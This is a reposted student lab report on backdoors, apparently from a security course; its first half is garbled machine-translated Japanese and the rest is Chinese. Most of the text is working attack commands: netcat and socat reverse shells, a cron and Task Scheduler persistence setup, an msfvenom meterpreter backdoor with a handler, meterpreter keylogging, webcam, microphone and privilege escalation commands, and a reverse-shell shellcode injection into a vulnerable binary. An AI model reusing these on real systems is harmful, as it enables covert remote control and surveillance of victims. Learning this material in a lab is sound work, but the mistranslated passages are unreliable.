20175133のゆうペイ陳EXP2バックドアの原則と実践

20175133のゆうペイ陳EXP2バックドアの原則と実践

 

0の基礎

0.1バックドアのコンセプト

  バックドアは、通常の認証プロセスとチャネルシステムを介してアクセス可能ではありません。

0.2バックドア?

  • コンパイラは、バックドアを残します
  • 滞在バックドアへのオペレーティングシステム
  • 当然の最も一般的なアプリケーションは、バックドアを残します
  • 特定のアプリケーションのための専用オペレーティングシステムまたは偽装バックドアに潜んがあります。

  狭い定義:

  • 特に、バックドアプログラムを実行するために設計されたオペレーティングシステムに潜む、「悪者」は、このプログラムに接続することができます
  • リモート各種コマンドを実行します。
  • コンセプトやトロイの木馬重複

0.3一般的なバックドア:netcatを

  • また、NC、NCATとして知られています
  • これは、基本的なTCP、UDPデータが送受信、下のツールです。使用は、多くの場合、バックドアの役割を果たしていると、他のツールと組み合わせて

1.実験の内容

1.1勝利は、Linuxのシェルを入手

次の練習の基本的なWindows Win7-64bit、カーリー2020-64bit。

・Windowsのモニタを開きます

指示指標入力コマンドアップと呼ばれる仮想マシンでwin7の  IPCONFIGビュー住所

 オープン監視、入力コマンド  -l -p ncat.exe 5133

 ・Linuxのリバウンド接続勝利

まず、入力されたコマンド  APT- GET UFWは、インストール、インストール後、入力コマンドを  無効UFW  閉じファイアウォールカーリー

 カーリーコマンド入力端子  NC 192.168199.136 5133 -e / binに/ SH 

WindowsでLinuxシェルを取得、そのようなLSとして、任意のコマンドを実行することができます

・Linuxは勝つシェルを取得します

指示入力端子カリで  ifconfigコマンドビュー住所

コマンドを入力します。  -l -p NC 5133、オープンリスニング

WindowsのターミナルWin7の仮想マシンでコマンドを入力し、接続のLinuxリバウンド  ncat.exe -e cmd.exe 192.168199.130 5133 

LinuxでWindowsのコマンドプロンプトを参照してください。

 ・NCデータ伝送

Win7の仮想マシン入力コマンド  -l ncat.exe 5133接続を確立します

LinuxのWindowsでの接続には、コマンドを入力し  、NC 192.168199.140 5133

データ伝送接続を確立します

 

•スタートトウモロコシ

Windowsターミナル入力  -l ncat.exe 5133リスニングを確立

Linuxの端末入力で  のcrontab -eは、[3]

最後の行に追加さ20である。4 * * * / binに/ netcatを192.168199.140 5133 -e / binに/ SH、毎日午前4時20分逆接続命令を実行することを意図し

時間(午前4時20分)に、逆接続され

 

 

1.2は動作してホストを取得socatに関するシェル、タスクを開始する計画を

解凍後に直接使用・ダウンロードsocatに関する、

・新しいタスクを作成します。

パス:のWindows-> [コントロールパネル] - > [管理ツール] - > [タスクスケジューラ。

・すべてのユーザーのための新しいトリガと設定

 

・新しいアンパックsocatに関するファイルで選択したプログラムやスクリプトの前に操作してパラメータを追加  リッスンTCP:5133 Execの:CMD.EXE、のPty、標準エラー出力 

 

* Windowsの再ログイン後のキャンセル、あなたは「ypcatの」実行中を見ることができます

 

・Linuxのターミナルを入力  socatに関する- TCP:192.168199.1395133を、シェルを見ることが、打ち上げ成功タスクスケジューラを説明

 

 

1.3 MSFのmeterpreter(または他のソフトウェア)を使用する実行可能ファイルを生成するために、使用NCAT やsocatに関するホストして実行するホストのシェルを取得します

入力端子Linuxコマンド  msfvenom -pのWindows / Meterpreter / reverse_tcp lhost = 192.168199.139 lportは= 5133 -f EXE> 20175133_backdoor.exe 

•入力はソフトウェアのバージョンを下げるために発見された後、次の情報が表示されます

・コマンド入力  GEMはバンドラーインストール:1.173バンドラのインストールバージョンが1.17.3

·安装好后,在Windows终端输入指令 ncat.exe -lv 5133 > 20175133_backdoor.exe ,建立监听,准备接收

 ·在Linux终端输入指令: nc 192.168.199.142 5133 < 20175133_backdoor.exe ,将后门程序20175133_backdoor.exe传送到Windows中

·可以看到来自Linux IP 192.168.199.130

 

·并看到生成的后门文件

·在Linux再打开一个终端,并输入 msfconsole ,打开msfconsole控制端

  依次输入,分别设置payload,LHOST,LPORT

  • use exploit/multi/handler启用侦听

  • set payload windows/x64/meterpreter/reverse_tcp 

  • set LHOST 192.168.199.130

  • set LPORT 5133 

  • exploit 开始监听

 在Windows中打开之前的后门文件,可以看到Linux获得了Windows的shell

 

1.4 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

 ·接上一步继续

 ·在kali终端输入指令 record_mic 截获音频

·输入指令 webcam_snap 使用摄像头拍照

 ·输入指令 screenshot 截屏

 

 ·输入命令 keyscan_start 记录击键,命令 keyscan_dump 查看击键记录

·输入指令 getuid 查看当前用户, getsystem 提权

·截获到:

 

1.5 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

·在官网下载用于反弹连接的shellcode

·参照实验一,关闭内存地址随机化,设置堆栈可执行

·根据上一次的步骤,可以得到shellcode地址为:0xffffd210+4=0xffffd214(终端一)

·打开刚才下载的文件里的c文件,并添加自己得到的shellcode地址生成新的shellcode

·再打开一个终端,输入(终端二):

perl -e 'print "A" x 32;print"\x14\xd2\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2
\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff
\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\
x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f
\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"
' > input_shellcode

·打开第三个终端,打开msfconsole,依次输入

use exploit/multi/handler  // 使用监听
set payload linux/x86/shell_reverse_tcp  
set LHOST 127.0.0.1  
set LPORT 4444  //使用默认主机号、端口号       
show options
exploit // 设置完成

·设置完成后,终端二输入指令 (cat input_shellcode;cat) | ./pwn1 可以看到监听控制台获得shell

 

 

2.问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:通过第三方网站下载软件(安装包)有很大概率,或者在安装软件时被诱导安装后门。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:Windows:将后门伪装成程序让受害者自己运行,或者引诱受害者运行;定时启动

linux:也可以定时启动、将其绑定到其他文件上,运行该文件时启动,或通过corn启动

(3)Meterpreter有哪些给你映像深刻的功能

答:被攻击机的隐私一览无余,尤其是开启摄像头、录音截屏等功能,随时会被监视,毫无隐私可言

(4)如何发现自己有系统有没有被安装后门?

答:初步可以打开杀软进行检查,也可以自己查看进程,看看是否有有嫌疑的进程,有一定条件的可以自行查看端口,是否有无故开启的端口。

 

3.实验感想

  这次的实验遇到了非常多的问题,足足做了4天之多,从不能安装启用msf再到接收不到被攻击机的shell,询问了许多同学,也得到了老师的帮助,好在最后问题都逐一化解。这次实验让我更加深刻地认识到了后门的“恐怖”,也让我加强了网络的防患意识,做完实验后我迅速打开了防火墙,避免在自己疏忽的情况下被植入后门,总而言之,这次实验不仅让我站在“攻击者”的角度学习、体验了获取别人的方法和途径,也让我感受到“受害者”的无奈和任人宰割,希望通过这次实验,时时刻刻提醒自己,注意网络安全。

 

おすすめ

転載: www.cnblogs.com/BESTIYPC/p/12492140.html